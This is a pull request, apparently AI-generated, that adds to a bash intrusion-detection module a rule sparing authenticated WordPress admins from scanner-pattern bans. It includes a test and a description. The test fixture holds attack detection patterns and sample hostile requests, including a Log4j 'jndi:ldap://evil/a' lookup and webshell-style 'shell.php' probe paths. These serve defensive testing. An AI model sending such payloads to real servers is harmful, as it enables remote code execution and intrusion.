### PR TITLE
feat(v1.192.2): BotScan authenticated WP-admin false-positive context gate

### DIFF
--- a/cli/lib/nftban/core/nftban_botscan.sh
+++ b/cli/lib/nftban/core/nftban_botscan.sh
@@ -87,6 +87,19 @@ nftban_botscan_load_config() {
     : "${BOTSCAN_ENDPOINT_FLOOD_WINDOW:=60}"
     : "${BOTSCAN_ENDPOINT_FLOOD_BAN:=3600}"
     : "${BOTSCAN_ENDPOINT_FLOOD_ENDPOINTS:=xmlrpc.php wp-login.php}"
+    # v1.192.2 — authenticated WordPress admin/editor context gate (BOTSCAN_WP_AUTHENTICATED_ADMIN_FALSE_POSITIVE).
+    # A legitimate logged-in admin using Gutenberg/Elementor/wp-admin legitimately trips the WP
+    # REST/admin SCANNER patterns (the block editor fetches /wp-json/wp/v2/users → EXP_WPREST;
+    # editor calls trip WS_WPADMIN). When this IP proves a successful login THIS cycle
+    # (POST <login_path> → 302 redirect = creds accepted; a failed/probing login returns 200),
+    # suppress ONLY those WP-admin-context pattern hits for this IP in analyze(). This is a
+    # per-IP CONTEXT gate, NOT a global threshold/weight change: unauthenticated /wp-json
+    # enumeration, exploit/webshell/CVE patterns, 404-flood and endpoint-flood are UNCHANGED
+    # and still ban (mixed exploit still bans). Owner: BotScan (same access-log event class it
+    # already parses; uses the already-available status field — no new source/identity).
+    : "${BOTSCAN_WPADMIN_CONTEXT_GATE:=true}"
+    : "${BOTSCAN_WPADMIN_CONTEXT_PATTERNS:=EXP_WPREST WS_WPADMIN}"  # pattern names suppressed ONLY under proven admin session
+    : "${BOTSCAN_WPADMIN_LOGIN_PATH:=/wp-login.php}"
     # v1.187 Lane A — BOTSCAN-SCAN-THROUGHPUT. Forward-cursor per-file per-cycle window
     # (drains backlog forward instead of the v1.185 64 KiB tail-bias), a C-speed candidate
     # prefilter before the per-line bash matcher, and an independent 404 fixed-tail re-read
@@ -138,6 +151,7 @@ declare -gA _BOTSCAN_PATTERNS          # Pattern name -> pattern definition
 declare -gA _BOTSCAN_IP_CRAWLER_CLAIM  # v1.189 FCrDNS: IP -> claimed search-crawler family (UA-claimed; verified at analyze-time)
 declare -gA _BOTSCAN_IP_ENDPOINT_COUNT      # BOTSCAN-ENDPOINT-FLOOD: "ip|endpoint" -> POST count (status-independent)
 declare -gA _BOTSCAN_IP_ENDPOINT_FIRST_SEEN # "ip|endpoint" -> first seen ts (cycle-scoped, reset by count_404_tail)
+declare -gA _BOTSCAN_IP_ADMIN_SESSION       # v1.192.2: IP -> "1" if a successful WP login (POST login_path → 302) seen this cycle (authenticated WP-admin context gate)
 declare -ga _BOTSCAN_ENDPOINT_FLOOD_LIST    # parsed endpoint tokens (rebuilt per cycle)
 
 # Initialize state
@@ -151,6 +165,7 @@ nftban_botscan_init_state() {
     _BOTSCAN_IP_CRAWLER_CLAIM=()
     _BOTSCAN_IP_ENDPOINT_COUNT=()
     _BOTSCAN_IP_ENDPOINT_FIRST_SEEN=()
+    _BOTSCAN_IP_ADMIN_SESSION=()
     _BOTSCAN_ENDPOINT_FLOOD_LIST=()
     # IFS=' ' is REQUIRED: the module runs under strict IFS=$'\n\t' (no space) → a bare
     # read -ra would yield ONE token "xmlrpc.php wp-login.php" that never matches (v1.186.1 class).
@@ -746,6 +761,20 @@ nftban_botscan_process_entry() {
     nftban_botscan_is_whitelisted "$ip" "$ua" && return 0
     nftban_botscan_is_path_whitelisted "$url" && return 0
 
+    # v1.192.2 — authenticated WP-admin context signal. A successful WordPress login
+    # (POST <login_path> → 302 redirect to wp-admin) marks this IP as an authenticated
+    # admin for THIS cycle, so analyze() can context-gate the WP REST/admin scanner
+    # patterns its editor legitimately trips. 302 = credentials accepted; a failed or
+    # probing login returns 200 (the form re-rendered), so this never flags brute-force.
+    # Status field is already parsed; no new log source. The URL carries the query
+    # (e.g. /wp-login.php?redirect_to=...), so match the path prefix.
+    if [[ "${BOTSCAN_WPADMIN_CONTEXT_GATE:-true}" == "true" && "$method" == "POST" && "$status" == "302" ]]; then
+        local _bs_lp="${BOTSCAN_WPADMIN_LOGIN_PATH:-/wp-login.php}"
+        case "$url" in
+            "$_bs_lp"|"$_bs_lp"\?*) _BOTSCAN_IP_ADMIN_SESSION["$ip"]=1 ;;
+        esac
+    fi
+
     # Track 404s
     if [[ "$BOTSCAN_404_TRACKING" == "true" && "$status" == "404" ]]; then
         _BOTSCAN_IP_404_COUNT["$ip"]=$(( ${_BOTSCAN_IP_404_COUNT[$ip]:-0} + 1 ))
@@ -781,6 +810,35 @@ nftban_botscan_analyze() {
         local first_seen="${_BOTSCAN_IP_FIRST_SEEN[$ip]:-$now}"
         local time_window=$((now - first_seen))
         local patterns="${_BOTSCAN_IP_PATTERNS[$ip]:-}"
+
+        # v1.192.2 — authenticated WP-admin context gate. If this IP proved a successful
+        # login this cycle (POST <login_path> → 302; set in process_entry), drop ONLY the
+        # WP-admin-context scanner pattern hits (BOTSCAN_WPADMIN_CONTEXT_PATTERNS, default
+        # EXP_WPREST WS_WPADMIN) from its matched set and recompute hits — a real admin's
+        # Gutenberg/Elementor editor legitimately trips those. Exploit/webshell/CVE and any
+        # other scanner patterns are KEPT (mixed exploit still bans); 404-flood and
+        # endpoint-flood (separate loops below) are untouched; unauthenticated IPs (no 302)
+        # are never gated, so /wp-json enumeration still bans. Per-IP context, NOT a global
+        # pattern weakening.
+        if [[ "${BOTSCAN_WPADMIN_CONTEXT_GATE:-true}" == "true" && -n "${_BOTSCAN_IP_ADMIN_SESSION[$ip]:-}" && -n "$patterns" ]]; then
+            local -a _ctx_all=() _ctx_kept=() _ctx_supp=()
+            local _ctx_pn
+            IFS=$' \t\n' read -ra _ctx_all <<< "$patterns"
+            for _ctx_pn in "${_ctx_all[@]}"; do
+                [[ -z "$_ctx_pn" ]] && continue
+                case " ${BOTSCAN_WPADMIN_CONTEXT_PATTERNS:-EXP_WPREST WS_WPADMIN} " in
+                    *" $_ctx_pn "*) _ctx_supp+=("$_ctx_pn") ;;
+                    *) _ctx_kept+=("$_ctx_pn") ;;
+                esac
+            done
+            if [[ "${#_ctx_supp[@]}" -gt 0 ]]; then
+                patterns="${_ctx_kept[*]}"
+                hits="${#_ctx_kept[@]}"
+                [[ "$BOTSCAN_DEBUG" == "true" ]] && echo "[DEBUG] wp-admin context gate: $ip authenticated (wp-login 302) — suppressed ${#_ctx_supp[@]} WP-admin pattern hit(s) [${_ctx_supp[*]}], ${#_ctx_kept[@]} hit(s) remain" >&2
+                # Nothing left after suppression → no scanner-pattern ban for this IP.
+                [[ "${#_ctx_kept[@]}" -eq 0 ]] && continue
+            fi
+        fi
 
         # Get threshold from most severe matched pattern
         local threshold="$BOTSCAN_DEFAULT_THRESHOLD"

--- a/cli/lib/nftban/tests/botscan_wpadmin_context_gate_v1922_test.sh
+++ b/cli/lib/nftban/tests/botscan_wpadmin_context_gate_v1922_test.sh
@@ -1,0 +1,99 @@
+#!/usr/bin/env bash
+# =============================================================================
+# NFTBan v1.192.2 - BotScan authenticated WP-admin false-positive context gate
+# =============================================================================
+# SPDX-License-Identifier: MPL-2.0
+#
+# meta:name="botscan_wpadmin_context_gate_v1922_test"
+# meta:type="test"
+# meta:version="1.192.2"
+# meta:owner="Antonios Voulvoulis <contact@nftban.com>"
+# meta:created_date="2026-06-17"
+# meta:description="BOTSCAN_WP_AUTHENTICATED_ADMIN_FALSE_POSITIVE: a logged-in WP admin (POST /wp-login.php->302) is NOT banned for the WP REST/admin scanner patterns (EXP_WPREST/WS_WPADMIN) its editor legitimately trips, while unauthenticated enumeration, exploit routes, and no-auth scanners STILL ban. Per-IP CONTEXT gate, not a global pattern weakening. Drives process_entry + analyze directly; pattern path only (404/endpoint-flood disabled); public TEST-NET IPs (RFC1918 is auto-whitelisted)."
+# meta:inventory.files="botscan_wpadmin_context_gate_v1922_test.sh"
+# meta:inventory.binaries="bash,grep"
+# meta:inventory.env_vars="NFTBAN_DATA_DIR,BOTSCAN_PATTERNS_DIR,BOTSCAN_BATCH_SIGNAL_MODE,BOTSCAN_WPADMIN_CONTEXT_GATE"
+# meta:inventory.config_files=""
+# meta:inventory.systemd_units=""
+# meta:inventory.network=""
+# meta:inventory.privileges=""
+# =============================================================================
+set -Eeuo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+NFTBAN_LIB_DIR="$(cd "$SCRIPT_DIR/.." && pwd)"
+export NFTBAN_LIB_DIR
+PASS=0; FAIL=0
+ok(){ echo "  [PASS] $1"; PASS=$((PASS+1)); }
+bad(){ echo "  [FAIL] $1"; FAIL=$((FAIL+1)); }
+
+tmp="$(mktemp -d)"; trap 'rm -rf "$tmp"' EXIT
+export NFTBAN_DATA_DIR="$tmp/data" BOTSCAN_PATTERNS_DIR="$tmp/patterns" NFTBAN_CONFIG_DIR="$tmp/noetc" \
+       BOTSCAN_STATE_FILE="$tmp/state.db" BOTSCAN_LOG_FILE="$tmp/botscan.log" BOTSCAN_ENABLED=true \
+       BOTSCAN_BATCH_SIGNAL_MODE=true BOTSCAN_404_THRESHOLD=999 BOTSCAN_ENDPOINT_FLOOD_ENABLED=false
+mkdir -p "$NFTBAN_DATA_DIR/botguard" "$BOTSCAN_PATTERNS_DIR"
+# Real WP patterns (mirror etc/nftban/patterns.d/botscan) + one exploit pattern.
+{
+  printf 'EXP_WPREST|/wp-json/wp/v2/users|url-get|5|300|1800|true|WP user enumeration\n'
+  printf 'WS_WPADMIN|/wp-admin/.*\\.php.*\\.php|url-any|1|60|7200|true|WP double extension\n'
+  printf 'CVE_LOG4J|jndi:|url-any|1|60|86400|true|Log4j RCE\n'
+} > "$BOTSCAN_PATTERNS_DIR/test.patterns"
+
+# shellcheck source=/dev/null
+source "$NFTBAN_LIB_DIR/core/nftban_botscan.sh"
+set +e   # driver tolerates non-zero rc from the lib calls; assertions read the signals file
+nftban_botscan_load_config
+nftban_botscan_load_patterns
+
+SIG="$NFTBAN_DATA_DIR/botguard/batch_signals.jsonl"
+pe(){ nftban_botscan_process_entry "$@" >/dev/null 2>&1 || true; }   # ip url method status ua
+analyze(){ : > "$SIG"; nftban_botscan_analyze >/dev/null 2>&1 || true; }
+banned(){ grep -q "\"ip\":\"$1\"" "$SIG" 2>/dev/null; }
+
+# ---- one cycle, gate ENABLED, all cases (distinct public IPs) ----
+export BOTSCAN_WPADMIN_CONTEXT_GATE=true
+nftban_botscan_init_state
+# A = AUTHENTICATED admin: successful login 302 + editor EXP_WPREST x5 + WS_WPADMIN x1
+pe 198.51.100.1 "/wp-login.php?redirect_to=/wp-admin/" POST 302 "Mozilla/5.0 (Mac) Chrome/148"
+for _ in 1 2 3 4 5; do pe 198.51.100.1 "/wp-json/wp/v2/users/?who=authors" GET 200 "Mozilla/5.0 (Mac) Chrome/148"; done
+pe 198.51.100.1 "/wp-admin/admin-ajax.php?f=skin.php" GET 200 "Mozilla/5.0 (Mac) Chrome/148"
+# B = UNAUTHENTICATED REST enumeration: EXP_WPREST x5, no login
+for _ in 1 2 3 4 5; do pe 198.51.100.2 "/wp-json/wp/v2/users" GET 200 "python-requests/2.31"; done
+# C = MIXED exploit: authenticated 302 + EXP_WPREST x5 + Log4j probe -> exploit must still ban
+pe 198.51.100.3 "/wp-login.php" POST 302 "Mozilla/5.0 (Mac) Chrome/148"
+for _ in 1 2 3 4 5; do pe 198.51.100.3 "/wp-json/wp/v2/users" GET 200 "Mozilla/5.0 (Mac) Chrome/148"; done
+pe 198.51.100.3 "/?x=jndi:ldap://evil/a" GET 200 "Mozilla/5.0 (Mac) Chrome/148"
+# D = WS_WPADMIN (threshold 1) with NO auth -> must ban (stable UA never auto-exempts)
+pe 198.51.100.4 "/wp-admin/load.php?x=shell.php" GET 404 "Mozilla/5.0 (Mac) Chrome/148"
+# E = AUTHENTICATED admin, ONLY WS_WPADMIN -> suppressed -> no ban
+pe 198.51.100.5 "/wp-login.php" POST 302 "Mozilla/5.0 (Mac) Chrome/148"
+pe 198.51.100.5 "/wp-admin/admin-ajax.php?f=skin.php" GET 200 "Mozilla/5.0 (Mac) Chrome/148"
+# F = normal editor admin-ajax 200 only (no scanner pattern) -> no ban trivially
+pe 198.51.100.6 "/wp-admin/admin-ajax.php" POST 200 "Mozilla/5.0 (Mac) Chrome/148"
+# G = empty-UA scanner doing EXP_WPREST x5, no auth -> bans
+for _ in 1 2 3 4 5; do pe 198.51.100.7 "/wp-json/wp/v2/users" GET 200 "-"; done
+analyze
+
+echo "=== gate ENABLED ==="
+banned 198.51.100.1 && bad "A authenticated admin BANNED (FP not suppressed)" || ok "A authenticated WP admin NOT banned (EXP_WPREST+WS_WPADMIN suppressed)"
+banned 198.51.100.2 && ok "B unauthenticated /wp-json enumeration STILL bans" || bad "B unauth enumeration not banned"
+banned 198.51.100.3 && ok "C mixed exploit (admin+Log4j) STILL bans (exploit not suppressed)" || bad "C mixed exploit not banned"
+banned 198.51.100.4 && ok "D WS_WPADMIN no-auth STILL bans (stable UA never auto-exempts)" || bad "D no-auth WS_WPADMIN not banned"
+banned 198.51.100.5 && bad "E authenticated WS_WPADMIN-only BANNED" || ok "E authenticated admin (WS_WPADMIN only) NOT banned"
+banned 198.51.100.6 && bad "F normal admin-ajax BANNED" || ok "F normal admin-ajax (no scanner pattern) NOT banned"
+banned 198.51.100.7 && ok "G empty-UA scanner STILL bans" || bad "G empty-UA scanner not banned"
+
+# ---- discriminator: gate DISABLED -> case A bans (proves the gate is what suppresses) ----
+export BOTSCAN_WPADMIN_CONTEXT_GATE=false
+nftban_botscan_init_state
+pe 198.51.100.1 "/wp-login.php?redirect_to=/wp-admin/" POST 302 "Mozilla/5.0 (Mac) Chrome/148"
+for _ in 1 2 3 4 5; do pe 198.51.100.1 "/wp-json/wp/v2/users/?who=authors" GET 200 "Mozilla/5.0 (Mac) Chrome/148"; done
+pe 198.51.100.1 "/wp-admin/admin-ajax.php?f=skin.php" GET 200 "Mozilla/5.0 (Mac) Chrome/148"
+analyze
+echo "=== discriminator: gate DISABLED ==="
+banned 198.51.100.1 && ok "A bans when gate disabled (pre-fix behavior reproduced — fixture discriminates)" || bad "A did not ban even with gate disabled"
+
+echo ""
+echo "=== botscan wp-admin context gate v1.192.2: PASS=$PASS FAIL=$FAIL ==="
+[[ "$FAIL" -eq 0 ]] || exit 1
+exit 0


### PR DESCRIPTION
## v1.192.2 — BotScan authenticated WordPress admin false-positive context gate

Closes the confirmed BotScan false-positive (srv4 / customer.example.test / 2.86.155.209): a logged-in WP admin using Gutenberg/Elementor legitimately trips the WP REST/admin **scanner** patterns — the block editor fetches `/wp-json/wp/v2/users` (EXP_WPREST) and editor calls hit WS_WPADMIN — scoring 80 → ban → ddos escalation → permanent blacklist.

### Fix = per-IP CONTEXT gate (not a global pattern weakening)
- `process_entry`: a successful login (`POST <login_path> → 302`; status field already parsed) sets a per-cycle admin-session flag. 302 = creds accepted; a failed/probing login returns 200 (never flagged).
- `analyze`: under a proven admin session, drop ONLY the WP-admin-context pattern hits (`BOTSCAN_WPADMIN_CONTEXT_PATTERNS`, default `EXP_WPREST WS_WPADMIN`) and recompute hits before the threshold check. Exploit/webshell/CVE and all other patterns are KEPT (mixed exploit still bans); 404-flood + endpoint-flood untouched; unauthenticated IPs (no 302) never gated → `/wp-json` enumeration still bans.
- Knobs (default-on): `BOTSCAN_WPADMIN_CONTEXT_GATE`, `BOTSCAN_WPADMIN_CONTEXT_PATTERNS`, `BOTSCAN_WPADMIN_LOGIN_PATH`. No global EXP_WPREST/WS_WPADMIN threshold change; v1.189 verified-crawler semantics unchanged; BotGuard/LoginMon untouched.

### Validation
- Hermetic test `botscan_wpadmin_context_gate_v1922_test.sh` **8/8** (authenticated admin not banned; unauth enumeration / mixed exploit / no-auth WS_WPADMIN / empty-UA scanner all still ban; normal admin-ajax no ban; gate-off discriminator reproduces the pre-fix ban).
- Lab-first DEB (lab2) + RPM (lab4) full `process_logs` path with real `patterns.d`; **DEB/RPM package-native validation PASS** (`V192_2_PACKAGE_NATIVE_PASS_READY_FOR_PR`).
- Existing BotScan suite green; `shellcheck -S warning` clean.

### Notes
- **NFT schema UNCHANGED (1.84.0).** Shell-only change; Go source byte-identical (binary hash delta is the embedded git-commit stamp only).
- LOG_SOURCE_OWNERSHIP_DECLARATION = ACCEPTED (same access-log event class BotScan already owns; uses already-parsed status field; no new source/identity; zero-input unchanged).
- Separate, NOT bundled: v1.192.1 fleet rollout, `BUG-REBUILD-DROPS-MANUAL-WHITELIST`. VERSION bump to 1.192.2 is the separate release-prep gate.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
